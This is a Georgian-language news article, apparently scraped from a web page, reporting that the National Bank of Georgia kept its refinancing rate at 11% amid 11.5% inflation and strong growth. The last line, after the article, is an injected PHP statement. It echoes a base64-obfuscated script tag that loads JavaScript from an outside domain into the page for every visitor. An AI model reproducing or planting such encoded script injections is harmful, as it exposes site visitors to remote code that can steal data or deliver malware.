celsiusi
ავერსი საქკაბელი
ეროვნული ბანკი მკაცრ მონეტარულ პოლიტიკას ინარჩუნებს. კომიტეტმა განაკვეთი (რეფინანსირების განაკვეთი) უცვლელად 11%-ზე დატოვა. კომიტეტმა ეს ნიშნული უკვე მეშვიდედ დატოვა უცვლელად.
 
მიზეზი კვლავინდებურად მაღალი ინფლაციური წნეხია. როგორც სებ-ში განმარტავენ, ეს ფაქტორი მსოფლიო ეკონომიკური ზრდის მოლოდინებს აუარესებს და სტაგფლაციის რისკებს წარმოქმნის.
 
ცენტრალური ბანკი აღნიშნავს, რომ საქართველოში ინფლაციამ პიკური პერიოდი გაიარა, თუმცა ჯერ კიდევ მაღალ დონეზეა და სექტემბერში წლიური 11.5% შეადგინა.
 
სებ-ის ასევე აღნიშნავს, რომ ბოლო დროს საერთაშორისო სასაქონლო ბაზრებზე პოზიტიური ტენდენცია შეინიშნება - პროდუქტების ფასები და საერთაშორისო ტრანსპორტირების ღირებულება მცირდება. ამასთან, მიუხედავად იმისა, რომ ჯერ კიდევ მაღალ დონეზეა, გაეროს სურსათისა და სოფლის მეურნეობის ორგანიზაციის (FAO) სურსათის საერთაშორისო ფასების ინდექსი ზედიზედ 6 თვეა იკლებს.
 
"მოსალოდნელია, რომ გაცვლითი კურსის გამყარების ფონზე, აღნიშნული გლობალური ტენდენციები ეტაპობრივად ადგილობრივ ბაზარსაც გადმოეცემა, რაც ინფლაციას შეამცირებს. თუმცა, მიმდინარე გეოპოლიტიკური ვითარებიდან გამომდინარე, გაურკვევლობა კვლავ მაღალია. ამავე დროს, ინფლაციის შემცირების რისკებს მისი მიზნობრივი მაჩვენებლიდან ხანგრძლივი პერიოდით გადახრაც აძლიერებს", - განმარტავენ ეროვნულ ბანკში.
 
ეკონომიკური აქტივობა კვლავაც ძლიერია. რუსეთ-უკრაინის ომისა და თანმდევი სანქციების შედეგად, საქართველოში მიგრაციული ნაკადები მნიშვნელოვნად გაიზარდა, რამაც ერთობლივი მოთხოვნა დაასტიმულირა. მიმდინარე წლის პირველი რვა თვის საშუალო წლიურმა ეკონომიკურმა ზრდამ 10.3 პროცენტი შეადგინა. შესაბამისად, ეკონომიკური ზრდის პროგნოზი 2022 წელს 10 პროცენტამდე გაიზარდა და, საშუალო წლიური ეკონომიკური აქტივობის დონე, სავარაუდოდ, მის პოტენციურ დონეს აღემატება. შედეგად, მოთხოვნიდან მომავალი ინფლაციური რისკები გამწვავდა, მიუხედავად იმისა, რომ ამას საგარეო შემოდინებების შედეგად გამყარებული ლარის გაცვლითი კურსი ნაწილობრივ აბალანსებს.
 
აღნიშნული რისკის საპასუხოდ მკაცრი მონეტარული პოლიტიკისა და ბოლო პერიოდში ამოქმედებული მაკროპრუდენციული ინსტრუმენტების ზემოქმედების შედეგად, საკრედიტო აქტივობის ზრდამ შენელება დაიწყო. მოსალოდნელია, რომ ეს ეფექტი მომავალში გაძლიერდება. ამასთან, ევროპის ცენტრალური ბანკისა და ფედერალური სარეზერვო სისტემის მიერ მონეტარულ პოლიტიკის გამკაცრებას საქართველოში, აშშ დოლარსა და ევროში მოზიდული სახსრების სარეზერვო მოთხოვნებზე ფიქსირებული ნულოვანი პროცენტის დარიცხვის პირობებში, უცხოური ვალუტის დაკრედიტებაზე პოლიტიკის დამატებით გამკაცრების ეფექტი აქვს. მცირდება ფისკალური დეფიციტიც. ამ ფაქტორების ერთობლიობა მოთხოვნიდან მომავალ ინფლაციურ წნეხს გაანეიტრალებს, რაც ინფლაციის შემცირებას შეუწყობს ხელს.
 
მონეტარული პოლიტიკის კომიტეტის შემდეგი სხდომა 2022 წლის 21 დეკემბერს ჩატარდება.
634
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");